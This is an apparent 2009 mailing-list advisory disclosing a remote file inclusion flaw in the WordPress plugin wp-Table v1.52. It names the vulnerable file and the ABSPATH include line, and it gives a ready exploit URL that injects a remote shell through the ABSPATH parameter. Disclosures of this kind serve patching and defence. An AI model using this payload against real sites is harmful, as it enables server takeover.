wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability

"Cru3l.b0y" <cru3l.b0y@xxxxxxxxx> · Thu, 30 Jul 2009 21:49:32 +0430

Hi Dear,
I found a new bug. please publish it.
thank you
best regards
===========================================================================================

  [o] wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability

       Software     :  wp-Table v1.52
       Vendor       :  http://wordpress.org/
       Download     :  http://wordpress.org/extend/plugins/wp-table/wp-table.zip
       Author       :  Cru3l.b0y
       Home         :  WwW.DeltaHacking.Net
       Description  :  This plugin is a simple table manager for wordpress.
===========================================================================================

  [o] Vulnerable file

         js/wptable-tinymce.php

	        require_once(ABSPATH.'/wp-admin/admin.php');

  [o] Exploit

            http://localhost/[path]/js/wptable-tinymce.php?ABSPATH=shell